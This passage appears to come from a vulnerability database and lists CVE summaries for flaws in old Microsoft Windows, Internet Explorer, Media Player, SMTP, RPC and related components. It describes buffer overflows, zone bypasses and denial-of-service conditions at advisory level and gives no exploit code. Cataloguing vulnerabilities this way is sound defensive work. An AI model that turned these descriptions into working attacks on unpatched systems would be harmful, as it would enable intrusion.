arbitrary code via a .wri, .rtf, and .doc file sent by email or malicious web site, aka "Font Conversion Vulnerability," a different vulnerability than CVE-2004-0571. [CVE-2004-0900] The DHCP Server service for Microsoft Windows NT 4.0 Server and Terminal Server Edition does not properly validate the length of certain messages, which allows remote attackers to execute arbitrary code via a malformed DHCP message, aka the "DHCP Request Vulnerability." [CVE-2004-0899] The DHCP Server service for Microsoft Windows NT 4.0 Server and Terminal Server Edition, with DHCP logging enabled, does not properly validate the length of certain messages, which allows remote attackers to cause a denial of service (application crash) via a malformed DHCP message, aka "Logging Vulnerability." [CVE-2004-0897] The Indexing Service for Microsoft Windows XP and Server 2003 does not properly validate the length of a message, which allows remote attackers to execute arbitrary code via a buffer overflow attack. [CVE-2004-0840] The SMTP (Simple Mail Transfer Protocol) component of Microsoft Windows XP 64-bit Edition, Windows Server 2003, Windows Server 2003 64-bit Edition, and the Exchange Routing Engine component of Exchange Server 2003, allows remote attackers to execute arbitrary code via a malicious DNS response message containing length values that are not properly validated. [CVE-2004-0727] Microsoft Internet Explorer 6.0.2800.1106 on Microsoft Windows XP SP2, and other versions including 5.01 and 5.5, allows remote web servers to bypass zone restrictions and execute arbitrary code in the local computer zone by redirecting a function to another function with the same name, as demonstrated by SimilarMethodNameRedir, aka the "Similar Method Name Redirection Cross Domain Vulnerability." [CVE-2004-0726] The Windows Media Player control in Microsoft Windows 2000 allows remote attackers to execute arbitrary script in the local computer zone via an ASX filename that contains javascript, which is executed in the local context in a preview panel. [CVE-2004-0575] Integer overflow in DUNZIP32.DLL for Microsoft Windows XP, Windows XP 64-bit Edition, Windows Server 2003, and Windows Server 2003 64-bit Edition allows remote attackers to execute arbitrary code via compressed (zipped) folders that involve an "unchecked buffer" and improper length validation. [CVE-2004-0574] The Network News Transfer Protocol (NNTP) component of Microsoft Windows NT Server 4.0, Windows 2000 Server, Windows Server 2003, Exchange 2000 Server, and Exchange Server 2003 allows remote attackers to execute arbitrary code via XPAT patterns, possibly related to improper length validation and an "unchecked buffer," leading to off-by-one and heap-based buffer overflows. [CVE-2004-0571] Microsoft Word for Windows 6.0 Converter does not properly validate certain data lengths, which allows remote attackers to execute arbitrary code via a .wri, .rtf, and .doc file sent by email or malicious web site, aka "Table Conversion Vulnerability," a different vulnerability than CVE-2004-0901. [CVE-2004-0569] The RPC Runtime Library for Microsoft Windows NT 4.0 allows remote attackers to read active memory or cause a denial of service (system crash) via a malicious message, possibly related to improper length values. [CVE-2004-0540] Microsoft Windows 2000, when running in a domain whose Fully Qualified Domain Name (FQDN) is exactly 8 characters long, does not prevent users with expired passwords from logging on to the domain. [CVE-2004-0503] Microsoft Outlook 2003 allows remote attackers to bypass the default zone restrictions and execute script within media files via a Rich Text Format (RTF) message containing an OLE object for the Windows Media Player, which bypasses Media Player's setting to disallow scripting and may lead to unprompted installation of an executable when exploited in conjunction with predictable-file-location exposures such as CVE-2004-0502. [CVE-2004-0214] Buffer overflow in Microsoft Internet Explorer and Explorer on Windows XP SP1, WIndows 2000, Windows 98, and Windows Me may allow remote malicious servers to cause a denial of service (application crash) and possibly execute arbitrary code via long share names, as demonstrated using Samba. [CVE-2004-0211] The kernel for Microsoft Windows Server 2003 does not reset certain values in CPU data structures, which allows local users to cause a denial of service (system crash) via a malicious program. [CVE-2004-0210] The POSIX component of Microsoft Windows NT and Windows 2000 allows local users to execute arbitrary code via certain parameters, possibly by modifying message length values and causing a buffer overflow. [CVE-2004-0209] Unknown vulnerability in the Graphics Rendering Engine processes of Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats that involve "an unchecked buffer." [CVE-2004-0208] The Virtual DOS Machine (VDM) subsystem of Microsoft Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows local users to access kernel memory and gain privileges via a malicious program that modified some system structures in a way that is not properly validated by privileged operating system functions. [CVE-2004-0207] "Shatter" style vulnerability in the Window Management application programming interface (API) for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows local users to gain privileges by using certain API functions to change properties of privileged programs using the SetWindowLong and SetWIndowLongPtr API functions. [CVE-2004-0206] Network Dynamic Data Exchange (NetDDE) services for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows attackers to remotely execute arbitrary code or locally gain privileges via a malicious message or application that involves an "unchecked buffer," possibly a buffer overflow. [CVE-2004-0202] IDirectPlay4 Application Programming Interface (API) of Microsoft DirectPlay 7.0a thru 9.0b, as used in Windows Server 2003 and earlier allows remote attackers to cause a denial of service (application crash) via a malformed packet. [CVE-2004-0201] Heap-based buffer overflow in the HtmlHelp program (hh.exe) in HTML Help for Microsoft Windows 98, Me, NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary commands via a .CHM file with a large length field, a different vulnerability than CVE-2003-1041. [CVE-2004-0199] Help and Support Center in Microsoft Windows XP and Windows Server 2003 SP1 does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code, as demonstrated using certain hcp:// URLs that access the DVD Upgrade capability (dvdupgrd.htm). [CVE-2004-0124] The DCOM RPC interface for Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause network communications via an "alter context" call that contains additional data, aka the "Object Identity Vulnerability." [CVE-2004-0120] The Microsoft Secure Sockets Layer (SSL) library, as used in Windows 2000, Windows XP, and Windows Server 2003, allows remote attackers to cause a denial of service via malformed SSL messages. [CVE-2004-0116] An Activation function in the RPCSS Service involved with DCOM activation for Microsoft Windows 2000, XP, and 2003 allows remote attackers to cause a denial of service (memory consumption) via an activation request with a large length field. [CVE-2003-1107] The DHTML capability in Microsoft Windows Media Player (WMP) 6.4, 7.0, 7.1, and 9 may run certain URL commands from a security zone that is less trusted than the current zone, which allows attackers to bypass intended access restrictions. [CVE-2003-1106] The SMTP service in Microsoft Windows 2000 before SP4 allows remote attackers to cause a denial of service (crash or hang) via an e-mail message with a malformed time stamp in the FILETIME attribute. [CVE-2003-0908] The Utility Manager in Microsoft Windows 2000 executes winhlp32.exe with system privileges, which allows local users to execute arbitrary code via a "Shatter" style attack using a Windows message that accesses the context sensitive help button in the GUI, as demonstrated using the File Open dialog in the Help window, a different vulnerability than CVE-2004-0213. [CVE-2003-0907] Help and Support Center in Microsoft Windows XP SP1 does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code via quotation marks in an hcp:// URL, which are not quoted when constructing the argument list to HelpCtr.exe. [CVE-2003-0906] Buffer overflow in the rendering for (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, and XP SP1 allows remote attackers to execute arbitrary code via a malformed WMF or EMF image. [CVE-2003-0839] Directory traversal vulnerability in the "Shell Folders" capability in Microsoft Windows Server 2003 allows remote attackers to read arbitrary files via .. (dot dot) sequences in a "shell:" link. [CVE-2003-0825] The Windows Internet Naming Service (WINS) for Microsoft Windows Server 2003, and possibly Windows NT and Server 2000, does not properly validate the length of certain packets, which allows attackers to cause a denial of service and possibly execute arbitrary code. [CVE-2003-0818] Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. [CVE-2003-0807] Buffer overflow in the COM Internet Services and in the RPC over HTTP Proxy components for Microsoft Windows NT Server 4.0, NT 4.0 Terminal Server Edition, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service via a crafted request. [CVE-2003-0806] Buffer overflow in the Windows logon process (winlogon) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, and XP SP1, when a member of a domain, allows remote attackers to execute arbitrary code. [CVE-2003-0719] Buffer overflow in the Private Communications Transport (PCT) protocol implementation in the Microsoft SSL library, as used in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via PCT 1.0 handshake packets. [CVE-2003-0662] Buffer overflow in Troubleshooter ActiveX Control (Tshoot.ocx) in Microsoft Windows 2000 SP4 and earlier allows remote attackers to execute arbitrary code via an HTML document with a long argument to the RunQuery2 method. [CVE-2003-0660] The Authenticode capability in Microsoft Windows NT through Server 2003 does not prompt the user to download and install ActiveX controls when the system is low on memory, which could allow remote attackers execute arbitrary code without user approval. [CVE-2003-0604] Windows Media Player (WMP) 7 and 8, as running on Internet Explorer and possibly other Microsoft products that process HTML, allows remote attackers to bypass zone restrictions and access or execute arbitrary files via an IFRAME tag pointing to an ASF file whose Content-location contains a File:// URL. [CVE-2003-0533] Stack-based buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via a packet that causes the DsRolerUpgradeDownlevelServer function to create long debug entries for the DCPROMO.LOG log file, as exploited by the Sasser worm. [CVE-2003-0496] Microsoft SQL Server before Windows 2000 SP4 allows local users to gain privileges as the SQL Server user by calling the xp_fileexist extended stored procedure with a named pipe as an argument instead of a normal file. [CVE-2003-0352] Buffer overflow in a certain DCOM interface for RPC in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary code via a malformed message, as exploited by the Blaster/MSblast/LovSAN and Nachi/Welchia worms. [CVE-2003-0349] Buffer overflow in the streaming media component for logging multicast requests in the ISAPI for the logging capability of Microsoft Windows Media Services (nsiislog.dll), as installed in IIS 5.0, allows remote attackers to execute arbitrary code via a large POST request to nsiislog.dll. [CVE-2003-0348] A certain Microsoft Windows Media Player 9 Series ActiveX control allows remote attackers to view and manipulate the Media Library on the local system via HTML script. [CVE-2003-0346] Multiple integer overflows in a Microsoft Windows DirectX MIDI library (QUARTZ.DLL) allow remote attackers to execute arbitrary code via a MIDI (.mid) file with (1) large length for a Text or Copyright string, or (2) a large number of tracks, which leads to a heap-based buffer overflow. [CVE-2003-0345] Buffer overflow in the SMB capability for Microsoft Windows XP, 2000, and NT allows remote attackers to cause a denial of service and possibly execute arbitrary code via an SMB packet that specifies a smaller buffer length than is required. [CVE-2003-0228] Directory traversal vulnerability in Microsoft Windows Media Player 7.1 and Windows Media Player for Windows XP allows remote attackers to execute arbitrary code via a skins file with a URL containing hex-encoded backslash characters (%5C) that causes an executable to be placed in an arbitrary location. [CVE-2003-0227] The logging capability for unicast and multicast transmissions in the ISAPI extension for Microsoft Windows Media Services in Microsoft Windows NT 4.0 and 2000, nsiislog.dll, allows remote attackers to cause a denial of service in Internet Information Server (IIS) and execute arbitrary code via a certain network request. [CVE-2003-0111] The ByteCode Verifier component of Microsoft Virtual Machine (VM) build 5.0.3809 and earlier, as used in Windows and Internet Explorer, allows remote attackers to bypass security checks and execute arbitrary code via a malicious Java applet, aka "Flaw in Microsoft VM Could Enable System Compromise." [CVE-2003-0109] Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0. [CVE-2003-0009] Cross-site scripting (XSS) vulnerability in Help and Support Center for Microsoft Windows Me allows remote attackers to execute arbitrary script in the Local Computer security context via an hcp:// URL with the malicious script in the topic parameter. [CVE-2003-0004] Buffer overflow in the Windows Redirector function in Microsoft Windows XP allows local users to execute arbitrary code via a long parameter. [CVE-2003-0003] Buffer overflow in the RPC Locator service for Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows local users to execute arbitrary code via an RPC call to the service containing certain parameter information. [CVE-2002-2283] Microsoft Windows XP with Fast User Switching (FUS) enabled does not remove the "show processes from all users" privilege when the user is removed from the administrator group, which allows that user to view prosesses of other users. [CVE-2002-2117] Microsoft Windows XP allows remote attackers to cause a denial of service (CPU consumption) by flooding UDP port 500 (ISAKMP). [CVE-2002-2105] Microsoft Windows XP allows local users to prevent the system from booting via a corrupt explorer.exe.manifest file. [CVE-2002-2073] Cross-site scripting (XSS) vulnerability in the default ASP pages on Microsoft Site Server 3.0 on Windows NT 4.0 allows remote attackers to inject arbitrary web script or HTML via the (1) ctr parameter in Default.asp and (2) the query string to formslogin.asp. [CVE-2002-1984] Microsoft Internet Explorer 5.0.1 through 6.0 on Windows 2000 or Windows XP allows remote attackers to cause a denial of service (crash) via an OBJECT tag that contains a crafted CLASSID (CLSID) value of "CLSID:00022613-0000-0000-C000-000000000046". [CVE-2002-1933] The terminal services screensaver for Microsoft Windows 2000 does not automatically lock the terminal window if the window is minimized, which could allow local users to gain access to the terminal server window. [CVE-2002-1932] Microsoft Windows XP and Windows 2000, when configured to send administrative alerts and the "Do not overwrite events (clear log manually)" option is set, does not notify the administrator when the log reaches its maximum size, which allows local users and remote attackers to avoid detection. [CVE-2002-1847] Buffer overflow in mplay32.exe of Microsoft Windows Media Player (WMP) 6.3 through 7.1 allows remote attackers to execute arbitrary commands via a long mp3 filename command line argument. NOTE: since the only known attack vector requires command line access, this may not be a vulnerability. [CVE-2002-1844] Microsoft Windows Media Player (WMP) 6.3, when installed on Solaris, installs executables with world-writable permissions, which allows local users to delete or modify the executables to gain privileges. [CVE-2002-1712] Microsoft Windows 2000 allows remote attackers to cause a denial of service (memory consumption) by sending a flood of empty TCP/IP packets with the ACK and FIN bits set to the NetBIOS port (TCP/139), as demonstrated by stream3. [CVE-2002-1692] Buffer overflow in backup utility of Microsoft Windows 95 allows attackers to execute arbitrary code by causing a filename with a long extension to be placed in a folder to be backed up. [CVE-2002-1670] Microsoft Windows XP Professional upgrade edition overwrites previously installed patches for Internet Explorer 6.0, leaving Internet Explorer unpatched. [CVE-2002-1327] Buffer overflow in the Windows Shell function in Microsoft Windows XP allows remote attackers to execute arbitrary code via an .MP3 or .WMA audio file with a corrupt custom attribute, aka "Unchecked Buffer in Windows Shell Could Enable System Compromise." [CVE-2002-1256] The SMB signing capability in the Server Message Block (SMB) protocol in Microsoft Windows 2000 and Windows XP allows attackers to disable the digital signing settings in an SMB session to force the data to be sent unsigned, then inject data into the session without detection, e.g. by modifying group policy information sent from a domain controller. [CVE-2002-1214] Buffer overflow in Microsoft PPTP Service on Windows XP and Windows 2000 allows remote attackers to cause a denial of service (hang) and possibly execute arbitrary code via a certain PPTP packet with malformed control data. [CVE-2002-1184] The system root folder of Microsoft Windows 2000 has default permissions of Everyone group with Full access (Everyone:F) and is in the search path when locating programs during login or application launch from the desktop, which could allow attackers to gain privileges as other users via Trojan horse programs. [CVE-2002-1183] Microsoft Windows 98 and Windows NT 4.0 do not properly verify the Basic Constraints of digital certificates, allowing remote attackers to execute code, aka "New Variant of Certificate Validation Flaw Could Enable Identity Spoofing" (CAN-2002-0862). [CVE-2002-1141] An input validation error in the Sun Microsystems RPC library Services for Unix 3.0 Interix SD, as implemented on Microsoft Windows NT4, 2000, and XP, allows remote attackers to cause a denial of service via malformed fragmented RPC client packets, aka "Denial of service by sending an invalid RPC request." [CVE-2002-1140] The Sun Microsystems RPC library Services for Unix 3.0 Interix SD, as implemented on Microsoft Windows NT4, 2000, and XP, allows remote attackers to cause a denial of service (service hang) via malformed packet fragments, aka "Improper parameter size check leading to denial of service." [CVE-2002-1139] The Compressed Folders feature in Microsoft Windows 98 with Plus! Pack, Windows Me, and Windows XP does not properly check the destination folder during the decompression of ZIP files, which allows attackers to place an executable file in a known location on a user's system, aka "Incorrect Target Path for Zipped File Decompression." [CVE-2002-0864] The Remote Data Protocol (RDP) version 5.1 in Microsoft Windows XP allows remote attackers to cause a denial of service (crash) when Remote Desktop is enabled via a PDU Confirm Active data packet that does not set the Pattern BLT command, aka "Denial of Service in Remote Desktop." [CVE-2002-0863] Remote Data Protocol (RDP) version 5.0 in Microsoft Windows 2000 and RDP 5.1 in Windows XP does not encrypt the checksums of plaintext session data, which could allow a remote attacker to determine the contents of encrypted sessions via sniffing, aka "Weak Encryption in RDP Protocol." [CVE-2002-0862] The (1) CertGetCertificateChain, (2) CertVerifyCertificateChainPolicy, and (3) WinVerifyTrust APIs within the CryptoAPI for Microsoft products including Microsoft Windows 98 through XP, Office for Mac, Internet Explorer for Mac, and Outlook Express for Mac, do not properly verify the Basic Constraints of intermediate CA-signed X.509 certificates, which allows remote attackers to spoof the certificates of trusted sites via a man-in-the-middle attack for SSL sessions, as originally reported for Internet Explorer and IIS. [CVE-2002-0724] Buffer overflow in SMB (Server Message Block) protocol in Microsoft Windows NT, Windows 2000, and Windows XP allows attackers to cause a denial of service (crash) via a SMB_COM_TRANSACTION packet with a request for the (1) NetShareEnum, (2) NetServerEnum2, or (3) NetServerEnum3, aka "Unchecked Buffer in Network Share Provider Can Lead to Denial of Service". [CVE-2002-0699] Unknown vulnerability in the Certificate Enrollment ActiveX Control in Microsoft Windows 98, Windows 98 Second Edition, Windows Millennium, Windows NT 4.0, Windows 2000, and Windows XP allow remote attackers to delete digital certificates on a user's system via HTML. [CVE-2002-0694] The HTML Help facility in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP uses the Local Computer Security Zone when opening .chm files from the Temporary Internet Files folder, which allows remote attackers to execute arbitrary code via HTML mail that references or inserts a malicious .chm file containing shortcuts that can be executed, aka "Code Execution via Compiled HTML Help File." [CVE-2002-0693] Buffer overflow in the HTML Help ActiveX Control (hhctrl.ocx) in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute code via (1) a long parameter to the Alink function, or (2) script containing a long argument to the showHelp function. [CVE-2002-0619] The Mail Merge Tool in Microsoft Word 2002 for Windows, when Microsoft Access is present on a system, allows remote attackers to execute Visual Basic (VBA) scripts within a mail merge document that is saved in HTML format, aka a "Variant of MS00-071, Word Mail Merge Vulnerability" (CVE-2000-0788). [CVE-2002-0618] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code in the Local Computer zone by embedding HTML scripts within an Excel workbook that contains an XSL stylesheet, aka "Excel XSL Stylesheet Script Execution". [CVE-2002-0617] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code by creating a hyperlink on a drawing shape in a source workbook that points to a destination workbook containing an autoexecute macro, aka "Hyperlinked Excel Workbook Macro Bypass." [CVE-2002-0616] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code by attaching an inline macro to an object within an Excel workbook, aka the "Excel Inline Macros Vulnerability." [CVE-2002-0615] The Windows Media Active Playlist in Microsoft Windows Media Player 7.1 stores information in a well known location on the local file system, allowing attackers to execute HTML scripts in the Local Computer zone, aka "Media Playback Script Invocation". [CVE-2002-0597] LANMAN service on Microsoft Windows 2000 allows remote attackers to cause a denial of service (CPU/memory exhaustion) via a stream of malformed data to microsoft-ds port 445. [CVE-2002-0444] Microsoft Windows 2000 running the Terminal Server 90-day trial version, and possibly other versions, does not apply group policies to incoming users when the number of connections to the SYSVOL share exceeds the maximum, e.g. with a maximum number of licenses, which can allow remote authenticated users to bypass group policies. [CVE-2002-0443] Microsoft Windows 2000 allows local users to bypass the policy that prohibits reusing old passwords by changing the current password before it expires, which does not enable the check for previous passwords. [CVE-2002-0373] The Windows Media Device Manager (WMDM) Service in Microsoft Windows Media Player 7.1 on Windows 2000 systems allows local users to obtain LocalSystem rights via a program that calls the WMDM service to connect to an invalid local storage device, aka "Privilege Elevation through Windows Media Device Manager Service". [CVE-2002-0372] Microsoft Windows Media Player versions 6.4 and 7.1 and Media Player for Windows XP allow remote attackers to bypass Internet Explorer's (IE) security mechanisms and run code via an executable .wma media file with a license installation requirement stored in the IE cache, aka the "Cache Path Disclosure via Windows Media Player". [CVE-2002-0370] Buffer overflow in the ZIP capability for multiple products allows remote attackers to cause a denial of service or execute arbitrary code via ZIP files containing entries with long filenames, including (1) Microsoft Windows 98 with Plus! Pack, (2) Windows XP, (3) Windows ME, (4) Lotus Notes R4 through R6 (pre-gold), (5) Verity KeyView, and (6) Stuffit Expander before 7.0. [CVE-2002-0224] The MSDTC (Microsoft Distributed Transaction Service Coordinator) for Microsoft Windows 2000, Microsoft IIS 5.0 and SQL Server 6.5 through SQL 2000 0.0 allows remote attackers to cause a denial of service (crash or hang) via malformed (random) input. [CVE-2002-0151] Buffer overflow in Multiple UNC Provider (MUP) in Microsoft Windows operating systems allows local users to cause a denial of service or possibly gain SYSTEM privileges via a long UNC request. [CVE-2002-0136] Microsoft Internet Explorer 5.5 on Windows 98 allows remote web pages to cause a denial of service (hang) via extremely long values for form fields such as INPUT and TEXTAREA, which can be automatically filled via Javascript. [CVE-2002-0055] SMTP service in Microsoft Windows 2000, Windows XP Professional, and Exchange 2000 allows remote attackers to cause a denial of service via a command with a malformed data transfer (BDAT) request. [CVE-2002-0054] SMTP service in (1) Microsoft Windows 2000 and (2) Internet Mail Connector (IMC) in Exchange Server 5.5 does not properly handle responses to NTLM authentication, which allows remote attackers to perform mail relaying via an SMTP AUTH command using null session credentials. [CVE-2002-0034] The Microsoft CONVERT.EXE program, when used on Windows 2000 and Windows XP systems, does not apply the default NTFS permissions when converting a FAT32 file system, which could cause the conversion to produce a file system with less secure permissions than expected. [CVE-2002-0018] In Microsoft Windows NT and Windows 2000, a trusting domain that receives authorization information from a trusted domain does not verify that the trusted domain is authoritative for all listed SIDs, which allows remote attackers to gain Domain Administrator privileges on the trusting domain by injecting SIDs from untrusted domains into the authorization data that comes from from the trusted domain. [CVE-2001-1451] Memory leak in the SNMP LAN Manager (LANMAN) MIB extension for Microsoft Windows 2000 before SP3, when the Print Spooler is not running, allows remote attackers to cause a denial of service (memory consumption) via a large number of GET or GETNEXT requests. [CVE-2001-1200] Microsoft Windows XP allows local users to bypass a locked screen and run certain programs that are associated with Hot Keys. [CVE-2001-1055] The Microsoft Windows network stack allows remote attackers to cause a denial of service (CPU consumption) via a flood of malformed ARP request packets with random source IP and MAC addresses, as demonstrated by ARPNuke. [CVE-2001-0909] Buffer overflow in helpctr.exe program in Microsoft Help Center for Windows XP allows remote attackers to execute arbitrary code via a long hcp: URL. [CVE-2001-0719] Buffer overflow in Microsoft Windows Media Player 6.4 allows remote attackers to execute arbitrary code via a malformed Advanced Streaming Format (ASF) file. [CVE-2001-0541] Buffer overflow in Microsoft Windows Media Player 7.1 and earlier allows remote attackers to execute arbitrary commands via a malformed Windows Media Station (.NSC) file. [CVE-2001-0509] Vulnerabilities in RPC servers in (1) Microsoft Exchange Server 2000 and earlier, (2) Microsoft SQL Server 2000 and earlier, (3) Windows NT 4.0, and (4) Windows 2000 allow remote attackers to cause a denial of service via malformed inputs. [CVE-2001-0504] Vulnerability in authentication process for SMTP service in Microsoft Windows 2000 allows remote attackers to use incorrect credentials to gain privileges and conduct activites such as mail relaying. [CVE-2001-0351] Microsoft Windows 2000 telnet service allows a local user to make a certain system call that allows the user to terminate a Telnet session and cause a denial of service. [CVE-2001-0350] Microsoft Windows 2000 telnet service creates named pipes with predictable names and does not properly verify them, which allows local users to execute arbitrary commands by creating a named pipe with the predictable name and associating a malicious program with it, the second of two variants of this vulnerability. [CVE-2001-0349] Microsoft Windows 2000 telnet service creates named pipes with predictable names and does not properly verify them, which allows local users to execute arbitrary commands by creating a named pipe with the predictable name and associating a malicious program with it, the first of two variants of this vulnerability. [CVE-2001-0348] Microsoft Windows 2000 telnet service allows attackers to cause a denial of service (crash) via a long logon command that contains a backspace. [CVE-2001-0347] Information disclosure vulnerability in Microsoft Windows 2000 telnet service allows remote attackers to determine the existence of user accounts such as Guest, or log in to the server without specifying the domain name, via a malformed userid. [CVE-2001-0346] Handle leak in Microsoft Windows 2000 telnet service allows attackers to cause a denial of service by starting a large number of sessions and terminating them. [CVE-2001-0345] Microsoft Windows 2000 telnet service allows attackers to prevent idle Telnet sessions from timing out, causing a denial of service by creating a large number of idle sessions. [CVE-2001-0261] Microsoft Windows 2000 Encrypted File System does not properly destroy backups of files that are encrypted, which allows a local attacker to recover the text of encrypted files. [CVE-2001-0245] Microsoft Index Server 2.0 in Windows NT 4.0, and Indexing Service in Windows 2000, allows remote attackers to read server-side include files via a malformed search request, aka a new variant of the "Malformed Hit-Highlighting" vulnerability. [CVE-2001-0242] Buffer overflows in Microsoft Windows Media Player 7 and earlier allow remote attackers to execute arbitrary commands via (1) a long version tag in an .ASX file, or (2) a long banner tag, a variant of the ".ASX Buffer Overrun" vulnerability as discussed in MS:MS00-090. [CVE-2001-0047] The default permissions for the MTS Package Administration registry key in Windows NT 4.0 allows local users to install or modify arbitrary Microsoft Transaction Server (MTS) packages and gain privileges, aka one of the "Registry Permissions" vulnerabilities. [CVE-2001-0003] Web Extender Client (WEC) in Microsoft Office 2000, Windows 2000, and Windows Me does not properly process Internet Explorer security settings for NTLM authentication, which allows attackers to obtain NTLM credentials and possibly obtain the password, aka the "Web Client NTLM Authentication" vulnerability. [CVE-2000-1218] The default configuration for the domain name resolver for Microsoft Windows 98, NT 4.0, 2000, and XP sets the QueryIpMatching parameter to 0, which causes Windows to accept DNS updates from hosts that it did not query, which allows remote attackers to poison the DNS cache. [CVE-2000-1217] Microsoft Windows 2000 before Service Pack 2 (SP2), when running in a non-Windows 2000 domain and using NTLM authentication, and when credentials of an account are locally cached, allows local users to bypass account lockout policies and make an unlimited number of login attempts, aka the "Domain Account Lockout" vulnerability. [CVE-2000-1113] Buffer overflow in Microsoft Windows Media Player allows remote attackers to execute arbitrary commands via a malformed Active Stream Redirector (.ASX) file, aka the ".ASX Buffer Overrun" vulnerability. [CVE-2000-1112] Microsoft Windows Media Player 7 executes scripts in custom skin (.WMS) files, which could allow remote attackers to gain privileges via a skin that contains a malicious script, aka the ".WMS Script Execution" vulnerability. [CVE-2000-1079] Interactions between the CIFS Browser Protocol and NetBIOS as implemented in Microsoft Windows 95, 98, NT, and 2000 allow remote attackers to modify dynamic NetBIOS name cache entries via a spoofed Browse Frame Request in a unicast or UDP broadcast datagram. [CVE-2000-0942] The CiWebHitsFile component in Microsoft Indexing Services for Windows 2000 allows remote attackers to conduct a cross site scripting (CSS) attack via a CiRestriction parameter in a .htw request, aka the "Indexing Services Cross Site Scripting" vulnerability. [CVE-2000-0929] Microsoft Windows Media Player 7 allows attackers to cause a denial of service in RTF-enabled email clients via an embedded OCX control that is not closed properly, aka the "OCX Attachment" vulnerability. [CVE-2000-0858] Vulnerability in Microsoft Windows NT 4.0 allows remote attackers to cause a denial of service in IIS by sending it a series of malformed requests which cause INETINFO.EXE to fail, aka the "Invalid URL" vulnerability. [CVE-2000-0849] Race condition in Microsoft Windows Media server allows remote attackers to cause a denial of service in the Windows Media Unicast Service via a malformed request, aka the "Unicast Service Race Condition" vulnerability. [CVE-2000-0790] The web-based folder display capability in Microsoft Internet Explorer 5.5 on Windows 98 allows local users to insert Trojan horse programs by modifying the Folder.htt file and using the InvokeVerb method in the ShellDefView ActiveX control to specify a default execute option for the first file that is listed in the folder. [CVE-2000-0771] Microsoft Windows 2000 allows local users to cause a denial of service by corrupting the local security policy via malformed RPC traffic, aka the "Local Security Policy Corruption" vulnerability. [CVE-2000-0742] The IPX protocol implementation in Microsoft Windows 95 and 98 allows remote attackers to cause a denial of service by sending a ping packet with a source IP address that is a broadcast address, aka the "Malformed IPX Ping Packet" vulnerability. [CVE-2000-0653] Microsoft Outlook Express allows remote attackers to monitor a user's email by creating a persistent browser link to the Outlook Express windows, aka the "Persistent Mail-Browser Link" vulnerability. [CVE-2000-0495] Microsoft Windows Media Encoder allows remote attackers to cause a denial of service via a malformed request, aka the "Malformed Windows Media Encoder Request" vulnerability. [CVE-2000-0331] Buffer overflow in Microsoft command processor (CMD.EXE) for Windows NT and Windows 2000 allows a local user to cause a denial of service via a long environment variable, aka the "Malformed Environment Variable" vulnerability. [CVE-2000-0228] Microsoft Windows Media License Manager allows remote attackers to cause a denial of service by sending a malformed request that causes the manager to halt, aka the "Malformed Media License Request" Vulnerability. [CVE-2000-0216] Microsoft email clients in Outlook, Exchange, and Windows Messaging automatically respond to Read Receipt and Delivery Receipt tags, which could allow an attacker to flood a mail system with responses by forging a Read Receipt request that is redirected to a large distribution list. [CVE-2000-0168] Microsoft Windows 9x operating systems allow an attacker to cause a denial of service via a pathname that includes file device names, aka the "DOS Device in Path Name" vulnerability. [CVE-2000-0089] The rdisk utility in Microsoft Terminal Server Edition and Windows NT 4.0 stores registry hive information in a temporary file with permissions that allow local users to read it, aka the "RDISK Registry Enumeration File" vulnerability. [CVE-1999-1291] TCP/IP implementation in Microsoft Windows 95, Windows NT 4.0, and possibly others, allows remote attackers to reset connections by forcing a reset (RST) via a PSH ACK or other means, obtaining the target's last sequence number from the resulting packet, then spoofing a reset to the target. [CVE-1999-0749] Buffer overflow in Microsoft Telnet client in Windows 95 and Windows 98 via a malformed Telnet argument. [CVE-1999-0681] Buffer overflow in Microsoft FrontPage Server Extensions (PWS) 3.0.2.926 on Windows 95, and possibly other versions, allows remote attackers to cause a denial of service via a long URL. [CVE-1999-0386] Microsoft Personal Web Server and FrontPage Personal Web Server in some Windows systems allows a remote attacker to read files on the server by using a nonstandard URL. [CVE-1999-0288] The WINS server in Microsoft Windows NT 4.0 before SP4 allows remote attackers to cause a denial of service (process termination) via invalid UDP frames to port 137 (NETBIOS Name Service), as demonstrated via a flood of random packets. [CVE-1999-0012] Some web servers under Microsoft Windows allow remote attackers to bypass access restrictions for files with long file names. [CVE-2013-5025] Unspecified vulnerability in an ActiveX control in the Help 